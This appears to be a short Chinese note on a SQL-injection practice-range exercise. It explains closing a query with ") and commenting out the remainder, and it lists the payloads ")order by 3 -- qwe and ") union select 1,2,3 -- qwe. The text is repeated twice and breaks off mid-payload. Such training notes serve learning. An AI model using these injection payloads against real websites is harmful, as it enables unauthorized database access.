靶场题目:
注意闭合
用”)进行闭合 进行闭合后就不再是字符串,输入的数据可以被当成代码执行 id=() 闭合了前括号, 还有注释掉后面的后括号,用-- qwe 主要是为了保留横横后面的空格,因为可以自动去除空格后的内容,就去掉了后括号
步骤:
")order by 3 -- qwe
") union select 1,2,3 -- qwe
“) and 1=
靶场题目:
注意闭合
用”)进行闭合 进行闭合后就不再是字符串,输入的数据可以被当成代码执行 id=() 闭合了前括号, 还有注释掉后面的后括号,用-- qwe 主要是为了保留横横后面的空格,因为可以自动去除空格后的内容,就去掉了后括号
步骤:
")order by 3 -- qwe
") union select 1,2,3 -- qwe
“) and 1=